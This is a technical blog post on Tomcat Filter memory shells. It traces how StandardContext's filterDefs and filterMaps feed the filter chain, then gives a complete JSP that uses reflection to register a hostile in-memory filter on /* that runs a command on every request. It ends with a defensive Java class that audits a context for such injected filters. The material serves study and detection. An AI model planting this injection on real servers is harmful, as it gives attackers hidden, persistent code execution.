Memory Shells, Part 2: Filter
Studying the Filter memory-shell source

First write an ordinary Filter to understand how the key data flows. Set a breakpoint on a line inside it and walk up the call stack: the caller is org.apache.catalina.core.ApplicationFilterChain#internalDoFilter. In it, locate `filters`, then the place where `filters` is populated: ApplicationFilterChain#addFilter. It has two call sites very close together; pick either one and you land in ApplicationFilterFactory#createFilterChain. Its logic is to iterate over the filterMaps, look up the filterConfig whose name matches each map, and add it to the filterChain.

So the two pieces of data to focus on are filterConfigs and filterMaps, both retrieved from StandardContext, so look at those two fields in StandardContext. filterConfigs is populated in StandardContext#filterStart, and the key/value pairs of each filterConfig come from filterDefs. In other words, once an entry has been put into filterDefs, calling filterStart populates filterConfigs. filterMaps can be traced the same way. Everything lives in StandardContext, so it is enough to change the values there directly.

Approach

1. Write a malicious Filter class.
2. Obtain the StandardContext.
3. Add an entry to filterDefs.
4. Add an entry to filterMaps.
5. Call filterStart.

Note: add the filterDef before the filterMap, because adding a filterMap first checks that a filterDef with that name exists and throws an exception if it does not. Once the JSP page below has been visited, the filter is loaded into memory; every subsequent request matching the filter's URL pattern triggers the malicious TomcatFilterShell#doFilter.

Full code

```jsp
<%@ page import="java.io.IOException" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%-- A malicious Filter class --%>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%!
public class TomcatFilterShell implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        System.out.println("AddTomcatFilter initialized");
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        Runtime.getRuntime().exec("open -a Calculator"); // macOS
        chain.doFilter(request, response);
    }

    @Override
    public void destroy() {
        System.out.println("AddTomcatFilter destroyed");
    }
}
%>
<%
try {
    String filterName = "filterShell";
    // 1. Get the ServletContext from the request
    ServletContext servletContext = request.getServletContext();
    // Get the ApplicationContext from the ServletContext (private field "context" of ApplicationContextFacade)
    Field applicationContextField = servletContext.getClass().getDeclaredField("context");
    applicationContextField.setAccessible(true);
    ApplicationContext applicationContext = (ApplicationContext) applicationContextField.get(servletContext);
    // Get the StandardContext from the ApplicationContext (private field "context" of ApplicationContext)
    Field standardContextField = applicationContext.getClass().getDeclaredField("context");
    standardContextField.setAccessible(true);
    StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);
    // 2. Add an entry to filterDefs
    FilterDef filterDef = new FilterDef();
    filterDef.setFilterName(filterName);
    filterDef.setFilterClass(TomcatFilterShell.class.getName());
    filterDef.setFilter(new TomcatFilterShell());
    standardContext.addFilterDef(filterDef);
    // 3. Add an entry to filterMaps
    FilterMap filterMap = new FilterMap();
    filterMap.setFilterName(filterName);
    filterMap.addURLPattern("/*");
    standardContext.addFilterMapBefore(filterMap);
    // 4. Call filterStart
    standardContext.filterStart();
    out.println("Filter注入成功");
} catch (Exception e) {
    e.printStackTrace();
    out.println("Filter注入失败");
}
%>
```

References

https://su18.org/post/memory-shell/
https://www.bilibili.com/video/BV1HaGPzcENy
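The same two StandardContext tables the injection writes to (filterDefs, read by filterStart, and filterMaps, iterated by createFilterChain) are also where a defender can look for a filter that exists only in memory. The following Java class is an added example written for this page, not code from the original post or from Tomcat; it assumes the caller already holds a StandardContext reference (for instance from a LifecycleListener, a Valve or a diagnostic session) and a set of filter names legitimately declared in web.xml or via @WebFilter on classes shipped with the application. It flags filters whose name is undeclared, whose FilterDef carries a pre-built instance (as the JSP above sets with setFilter), whose class was compiled from a JSP, or whose .class file cannot be found on the webapp classpath.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;

import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

/**
 * Added defensive example (not from the original post): walk the filterDefs and
 * filterMaps of a StandardContext and report entries with the fingerprints of a
 * filter registered at runtime rather than from the deployed application.
 */
public class FilterAudit {

    /** One finding per filter name; reasons stays empty for filters that look benign. */
    public static final class Finding {
        public final String filterName;
        public final String filterClass;
        public final List<String> urlPatterns = new ArrayList<>();
        public final List<String> reasons = new ArrayList<>();

        Finding(String filterName, String filterClass) {
            this.filterName = filterName;
            this.filterClass = filterClass;
        }

        public boolean suspicious() {
            return !reasons.isEmpty();
        }
    }

    /**
     * @param ctx                 the StandardContext to inspect (assumed to be available to the caller)
     * @param declaredFilterNames filter names from web.xml / @WebFilter on classes on disk (assumed known)
     */
    public static List<Finding> audit(StandardContext ctx, Set<String> declaredFilterNames) {
        ClassLoader webLoader = ctx.getLoader() == null ? null : ctx.getLoader().getClassLoader();
        Map<String, Finding> byName = new LinkedHashMap<>();

        // filterDefs: the table StandardContext#filterStart reads to build filterConfigs
        for (FilterDef def : ctx.findFilterDefs()) {
            Finding f = new Finding(def.getFilterName(), def.getFilterClass());
            byName.put(f.filterName, f);

            if (!declaredFilterNames.contains(f.filterName)) {
                f.reasons.add("filter name is not declared in web.xml / @WebFilter");
            }
            // The injection on this page calls FilterDef.setFilter(new TomcatFilterShell()).
            // Frameworks using ServletContext.addFilter(name, instance) do the same, so this is
            // supporting evidence rather than proof on its own.
            if (def.getFilter() != null) {
                f.reasons.add("FilterDef carries a pre-built Filter instance");
            }
            if (f.filterClass != null) {
                // A class declared inside a JSP is compiled into org.apache.jsp.<page>_jsp$Inner
                if (f.filterClass.contains("_jsp")) {
                    f.reasons.add("filter class was compiled from a JSP");
                }
                // A filter that exists only in memory has no .class under WEB-INF/classes or WEB-INF/lib
                String resource = f.filterClass.replace('.', '/') + ".class";
                if (webLoader != null && webLoader.getResource(resource) == null) {
                    f.reasons.add("no " + resource + " on the webapp classpath");
                }
            }
        }

        // filterMaps: the table ApplicationFilterFactory#createFilterChain iterates for each request
        for (FilterMap map : ctx.findFilterMaps()) {
            Finding f = byName.get(map.getFilterName());
            if (f == null) {
                // addFilterMap validates that a filterDef exists, so an orphan map is itself notable
                f = new Finding(map.getFilterName(), null);
                f.reasons.add("filterMap without a matching filterDef");
                byName.put(f.filterName, f);
            }
            List<String> patterns = Arrays.asList(map.getURLPatterns());
            f.urlPatterns.addAll(patterns);
            if (f.suspicious() && patterns.contains("/*")) {
                f.reasons.add("mapped to /* (sees every request)");
            }
        }
        return new ArrayList<>(byName.values());
    }

    /** One line per suspicious filter, suitable for a log or console. */
    public static String report(List<Finding> findings) {
        StringBuilder sb = new StringBuilder();
        for (Finding f : findings) {
            if (!f.suspicious()) continue;
            sb.append(f.filterName).append(" [").append(f.filterClass).append("] ")
              .append(f.urlPatterns).append(" -> ").append(String.join("; ", f.reasons)).append('\n');
        }
        return sb.toString();
    }
}
```

Build declaredFilterNames from the deployed artifact (web.xml plus an annotation scan of WEB-INF/classes and WEB-INF/lib) and add the names your framework registers programmatically, since embedded frameworks legitimately register filters with pre-built instances and undeclared names. A filter that hits several of the indicators at once, in particular one compiled from a JSP and mapped to /*, matches the injection shown above; restarting the JVM removes it, because nothing on disk recreates the filterDef.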
Source: http://www.coloradmin.cn/o/2409184.html